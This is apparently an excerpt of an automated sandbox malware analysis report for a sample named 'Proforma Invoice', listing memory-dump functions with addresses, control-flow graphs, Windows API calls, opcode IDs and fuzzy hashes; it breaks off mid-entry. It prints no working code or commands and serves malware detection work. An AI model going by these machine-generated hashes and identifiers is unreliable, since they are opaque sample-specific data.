                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: d970c18dd65429b932d395be515cfb7ae484144b58e912b7bae2ff88bc2421d8
                                                                                                    • Instruction ID: c0cd17c6c0e4e83eb6ea7719e4e0a057086a065d7327d6e34bea8c67a93ccdc0
                                                                                                    • Opcode Fuzzy Hash: d970c18dd65429b932d395be515cfb7ae484144b58e912b7bae2ff88bc2421d8
                                                                                                    • Instruction Fuzzy Hash: C71112B6C003498FDB10CFAAD844BDEBBF4AB88324F15852AE429A7610C375A545CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06965810 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1795 6965810-6965850 1796 6965852-6965855 1795->1796 1797 6965858-6965887 LoadLibraryExW 1795->1797 1796->1797 1798 6965890-69658ad 1797->1798 1799 6965889-696588f 1797->1799 1799->1798
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0696587A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 49d968bc34128191c5e44a355b424d80785b796a170de110b446f18af1c433fc
                                                                                                    • Instruction ID: ec10f11e029e80d684e78a9793b76a3fb88e0607a421c2154ea270d2b3615609
                                                                                                    • Opcode Fuzzy Hash: 49d968bc34128191c5e44a355b424d80785b796a170de110b446f18af1c433fc
                                                                                                    • Instruction Fuzzy Hash: 5311F3B6D003499FDB10CF9AC444BDEFBF8EB88324F15842AE519A7610C375A545CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 069648E4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1802 69648e4-69655e8 1804 69655f0-696561b GetModuleHandleW 1802->1804 1805 69655ea-69655ed 1802->1805 1806 6965624-6965638 1804->1806 1807 696561d-6965623 1804->1807 1805->1804 1807->1806
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,069653DB), ref: 0696560E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 6ee884339721365fbd31903c28a2c467d867cb50477d73183a4c821328bd9b2a
                                                                                                    • Instruction ID: bd9724403d40945ee5435321e57c9129c6e84ff06f97eed99e2cd78d6b45a136
                                                                                                    • Opcode Fuzzy Hash: 6ee884339721365fbd31903c28a2c467d867cb50477d73183a4c821328bd9b2a
                                                                                                    • Instruction Fuzzy Hash: E41102B6C003498FDB20CF9AC448BDEFBF8EF88224F15841AE819A7600D375A545CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0696E4FB Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1809 696e4fb-696e4ff 1810 696e500-696e562 OleInitialize 1809->1810 1811 696e564-696e56a 1810->1811 1812 696e56b-696e588 1810->1812 1811->1812
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0696E555
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: f0135212b0493cada7e7db5aaeef9229514026da849e1a14f2e62aeb1cbddb09
                                                                                                    • Instruction ID: cb5d0a2f65022c7484e9f940ad0444e8f2ac9b4733f9b0868b80fa860331b8f5
                                                                                                    • Opcode Fuzzy Hash: f0135212b0493cada7e7db5aaeef9229514026da849e1a14f2e62aeb1cbddb09
                                                                                                    • Instruction Fuzzy Hash: 471115B58043488FCB20DF9AD449BDEBBF4AB48324F14841AE519A7600D378A544CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0696C9B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1815 696c9b0-696e562 OleInitialize 1817 696e564-696e56a 1815->1817 1818 696e56b-696e588 1815->1818 1817->1818
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0696E555
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: fabd3dc3803c397a49e4e36ed0b5fbbaf193acb4223764e5be69dce9c800911d
                                                                                                    • Instruction ID: fe744109968f37debf49d278a9b9a5d56873ffe1828f617dd6f66eb494f5b63d
                                                                                                    • Opcode Fuzzy Hash: fabd3dc3803c397a49e4e36ed0b5fbbaf193acb4223764e5be69dce9c800911d
                                                                                                    • Instruction Fuzzy Hash: DA1145B5804348CFDB10DF9AC448BDEBBF4EB48324F14881AE519A7600D374A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06784EB0 Relevance: .7, Instructions: 675COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 102b82f0bd8e17e8b2d591f2330e30ff5084ec61f2224c1efab0afce12c8df57
                                                                                                    • Instruction ID: 8927d3a6fb869ffb52737a7584bc1e4847f9d95c299b112f796f78326e8f0523
                                                                                                    • Opcode Fuzzy Hash: 102b82f0bd8e17e8b2d591f2330e30ff5084ec61f2224c1efab0afce12c8df57
                                                                                                    • Instruction Fuzzy Hash: BC32BF30F402098FDB90EBB8D9486ADB7F2AF89314F148869D509DB391EB35DC45CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06786CB0 Relevance: .4, Instructions: 413COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d772f73875113579daaf92eea73a0a87aa0042ed929a04b7247e2fe4ca8ef4ea
                                                                                                    • Instruction ID: fba3ae4164dbe827553a14e8ed4b3860bb75f931881908beaf7bcb1b8389397e
                                                                                                    • Opcode Fuzzy Hash: d772f73875113579daaf92eea73a0a87aa0042ed929a04b7247e2fe4ca8ef4ea
                                                                                                    • Instruction Fuzzy Hash: 92D1C631B093899FE7429729CC2576A7BF69F86304F1980B2E548CF3A2EA75DC05C761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678D7F0 Relevance: .4, Instructions: 370COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 48ada2a70b61b27d4a73a39aa3f98dca87fe1c43726e77645f96ead27ce748c3
                                                                                                    • Instruction ID: 133b8e96dd27b28d1b9b6f46c8d6460ebad8c311d29846952b951ddbf8f2d7cc
                                                                                                    • Opcode Fuzzy Hash: 48ada2a70b61b27d4a73a39aa3f98dca87fe1c43726e77645f96ead27ce748c3
                                                                                                    • Instruction Fuzzy Hash: 1DD1E270A002098FDB64EF68C454AAEBBF6FF89314F15846AD109DB792DB34DC46CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678D190 Relevance: .4, Instructions: 350COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4b0c97f6f61fe9f48cd51594aa44b96c261162b96dbf0c7d23463e3867881edd
                                                                                                    • Instruction ID: d699444345fc3edabb8b45ac4373a5112a6015881c77216a049c58734ac5471b
                                                                                                    • Opcode Fuzzy Hash: 4b0c97f6f61fe9f48cd51594aa44b96c261162b96dbf0c7d23463e3867881edd
                                                                                                    • Instruction Fuzzy Hash: B9D1F831A042059FC761EF68C884AAABBB6FF86324F15C565E918CB391D735EC11CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06789958 Relevance: .3, Instructions: 297COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1d1e313fc01d247872eee627d7f0b43b3dc64cc536a59b0e663a9ea73db732e9
                                                                                                    • Instruction ID: 8e8da9b968ea0382975fc129b789e2c98e5aac0cd33a9fb2bda2a7a9935a5a0e
                                                                                                    • Opcode Fuzzy Hash: 1d1e313fc01d247872eee627d7f0b43b3dc64cc536a59b0e663a9ea73db732e9
                                                                                                    • Instruction Fuzzy Hash: 5FC1BF31A04249DFCF55DFA8C884AEDBFB2FF89310F148156EA05AB262D731AC55CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06788911 Relevance: .3, Instructions: 285COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ac3a1a05e4dcdbe7b549899403e510038c12c0c4c6ac5f460405a95bb20d810e
                                                                                                    • Instruction ID: a20cdbe6da951b7993097085b3692811e633f56af9e3404e3cea7b55811c2f00
                                                                                                    • Opcode Fuzzy Hash: ac3a1a05e4dcdbe7b549899403e510038c12c0c4c6ac5f460405a95bb20d810e
                                                                                                    • Instruction Fuzzy Hash: 41A18C30B002459FDB54EBB8D5287AEBBE2AF89204F148979D406DB795EF34DC06C792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678ABC0 Relevance: .3, Instructions: 274COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8ba3d887b4f9de60f9f8fae4c573e0ed0364b96b78eb064234eec85962b0ae3c
                                                                                                    • Instruction ID: 8fba77400ba5387a70ed5df34af3578c5ece308321b548a3a754d2a5d0b4cd70
                                                                                                    • Opcode Fuzzy Hash: 8ba3d887b4f9de60f9f8fae4c573e0ed0364b96b78eb064234eec85962b0ae3c
                                                                                                    • Instruction Fuzzy Hash: F5A1DF30B442099FDB85EB64C858B7E77A7AF88705F158429EA0ADB394DF70DC41C7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06786959 Relevance: .2, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0a568276928c1ef6cfb109ab0277be8bdb38b4b751bc9d05b3c3d4d9e51d059
                                                                                                    • Instruction ID: 64a6f49b275d5e249a3af6da6532b9c2baced497a40255c7ff3006bd1398abbd
                                                                                                    • Opcode Fuzzy Hash: c0a568276928c1ef6cfb109ab0277be8bdb38b4b751bc9d05b3c3d4d9e51d059
                                                                                                    • Instruction Fuzzy Hash: 07A19F38E043099FCB41EFB4D869A9DBBB1AF48300F158966D514EB369EB35AC05CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 067889C0 Relevance: .2, Instructions: 224COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c23bbf33477271c6190c13dcd0b14611aba5e248600b3b1d257563ee60a2d9a
                                                                                                    • Instruction ID: 7578fc118d8376ada0291832f85f8f3b712ad37e90db664a957e34afc8b6badb
                                                                                                    • Opcode Fuzzy Hash: 6c23bbf33477271c6190c13dcd0b14611aba5e248600b3b1d257563ee60a2d9a
                                                                                                    • Instruction Fuzzy Hash: DD714D70F402059FDB58EBB8D5687AE76E6AF88304F148939E506DB784EF34DC068792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678D541 Relevance: .2, Instructions: 220COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 85c1324648183b96edc7e4f89cf3f62491f029ae5a67568024b204ee5969aabd
                                                                                                    • Instruction ID: 3685da8161e85960f58eae3753a19dbca196071e9eed114747e5d752ee7f290c
                                                                                                    • Opcode Fuzzy Hash: 85c1324648183b96edc7e4f89cf3f62491f029ae5a67568024b204ee5969aabd
                                                                                                    • Instruction Fuzzy Hash: 9D711370B402098FDB64EB69C890BBEB7B6AF85310F14847AD506DB3D1EA38CD41C7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 067896B8 Relevance: .2, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8bbdb57379d97d58df644a57325ab1f93a6eb546c2cc846c269bc05350c474cb
                                                                                                    • Instruction ID: 92c213798d0e3175ad5548e48755e3b7507fb89c78b24deb84194e2e4ca92140
                                                                                                    • Opcode Fuzzy Hash: 8bbdb57379d97d58df644a57325ab1f93a6eb546c2cc846c269bc05350c474cb
                                                                                                    • Instruction Fuzzy Hash: C971F934B802068FDB95EF2CC894AB97BE5AF49710F1944A9EA15CB371DB70DC41CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678B728 Relevance: .2, Instructions: 199COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2ee4a28d499a9fe2ee0e67d94c2917afe654417e951cc875dc3f357d10c1365c
                                                                                                    • Instruction ID: b074f33987be7da68f2005b4d4dc1bf669d8145c205d5db7d8635e8a4f1cc823
                                                                                                    • Opcode Fuzzy Hash: 2ee4a28d499a9fe2ee0e67d94c2917afe654417e951cc875dc3f357d10c1365c
                                                                                                    • Instruction Fuzzy Hash: 34619C30B402049FE764EB78C858B6EBAE6AFC9704F15C428D40AAB791DF75EC46C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06786340 Relevance: .2, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84b4cb0ee37b5a76e70c6d30411838bd766bcdec55d1393427d3d8804cb9abcf
                                                                                                    • Instruction ID: 73c703267b1dfbdcc760db378e712bf8ceacdc10fc8aa4473f9ee41a3d1e52ed
                                                                                                    • Opcode Fuzzy Hash: 84b4cb0ee37b5a76e70c6d30411838bd766bcdec55d1393427d3d8804cb9abcf
                                                                                                    • Instruction Fuzzy Hash: 6351DC32F405159FDB90EB78C858B6EB2A2AF89314F218079DA1DDB7A4DB30DD01CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678A330 Relevance: .2, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ba99f6c07b6a96022ce48b465db90db33b523ea6827218d0e8e5c2f1b3adc2c8
                                                                                                    • Instruction ID: ae138d2a42cb13eb39193c9b03ea4079d14de1ee1b1fc6826544b1fabaceb917
                                                                                                    • Opcode Fuzzy Hash: ba99f6c07b6a96022ce48b465db90db33b523ea6827218d0e8e5c2f1b3adc2c8
                                                                                                    • Instruction Fuzzy Hash: FA61A070E407498FDF15CFA9C5446EEBBF2AF89310F20865AE809AB241DB74AD81CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678A320 Relevance: .1, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3c872bc95313e09211fa171bcf3ba16707d5fb85d7cab62a76fad79df9ea860
                                                                                                    • Instruction ID: ba6863de75f9914138001dcee8e03fb1fb5ff6dc14002c6f901d2a289c71d52f
                                                                                                    • Opcode Fuzzy Hash: a3c872bc95313e09211fa171bcf3ba16707d5fb85d7cab62a76fad79df9ea860
                                                                                                    • Instruction Fuzzy Hash: B251AF70D007498FDF21CFA9C5446EDFBF2AF89310F25865AE848AB241DB34AD81CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06788CAC Relevance: .1, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d396b704229f46fa80f879c626496cb510790838a3cc5731d91fb60f8b8ba332
                                                                                                    • Instruction ID: 08fba63d42c9064f2f011404934b4ab7df808c506007e861350bb7e8e0f208a2
                                                                                                    • Opcode Fuzzy Hash: d396b704229f46fa80f879c626496cb510790838a3cc5731d91fb60f8b8ba332
                                                                                                    • Instruction Fuzzy Hash: 0341A370F511048FDB94EBB4D529B7E7AE6AF88240F148929E806DB385DF34DC06CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06786AA8 Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e7f6b371f3bfdf18ca163ee2af33b951efcd486c473efb5dbddd7df548164de7
                                                                                                    • Instruction ID: e70e62e7383ae3c655355e1ee9157ee9635f3d0c3befa83517239e650b72fa6e
                                                                                                    • Opcode Fuzzy Hash: e7f6b371f3bfdf18ca163ee2af33b951efcd486c473efb5dbddd7df548164de7
                                                                                                    • Instruction Fuzzy Hash: 5951C878D00309DFCB40EFA4E9A998DBBB1BF48314F518926D525AB728EB31AD45CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06789B13 Relevance: .1, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c50c3a8408b9cfb5bf2859e7cfb088c37ac1a47c4f8dc342d546da18a32ce094
                                                                                                    • Instruction ID: 5f7c7364bd8cd48b8a796d6ebb51e4aac0ace74cc1b0e64cb52ce30ec2ec0f4c
                                                                                                    • Opcode Fuzzy Hash: c50c3a8408b9cfb5bf2859e7cfb088c37ac1a47c4f8dc342d546da18a32ce094
                                                                                                    • Instruction Fuzzy Hash: 61419E31A44249DFCF55DFA8C844ABDBFB2AF45310F048255EA15AB2A2D331ED54CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 067857B8 Relevance: .1, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a03a7464a54852857e436d488b8bad7301aeb1ce2389ebe2bad7e68e0d359569
                                                                                                    • Instruction ID: 70695b4c41022edaf24081ce84097312696b66edbd0fdee8556337ff3d3ce557
                                                                                                    • Opcode Fuzzy Hash: a03a7464a54852857e436d488b8bad7301aeb1ce2389ebe2bad7e68e0d359569
                                                                                                    • Instruction Fuzzy Hash: 6A31F231F542499FE780AB74D81977E7BEADB85344F408872D909CB385EA34CD0587A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678FC68 Relevance: .1, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: edaffb7647f85be2753d349f723c7e7e3fe92a778ab2af65b3720d2a440b0013
                                                                                                    • Instruction ID: 1f96978b9ad765be3baa5c0dabb25f37c74757c5eb72b495d7b54d73df1e2289
                                                                                                    • Opcode Fuzzy Hash: edaffb7647f85be2753d349f723c7e7e3fe92a778ab2af65b3720d2a440b0013
                                                                                                    • Instruction Fuzzy Hash: 8D41F538A59244EFCB80EB74E45936E7BB1EB41209F5085A9C905C73D1EB388F89CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 067871A0 Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ed6301ebc26595c3bb5342939873464983b11071265cc7c7890286b928b23042
                                                                                                    • Instruction ID: 83650f541e2e1046cb1e727c19c7318b53c0e948fb9e7f9a2ee51aab2b7488a3
                                                                                                    • Opcode Fuzzy Hash: ed6301ebc26595c3bb5342939873464983b11071265cc7c7890286b928b23042
                                                                                                    • Instruction Fuzzy Hash: 91315E31B101058FDB98EB74D4586AE77B6AF88204B248868E406EB354EF38DD49CBD5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06787190 Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
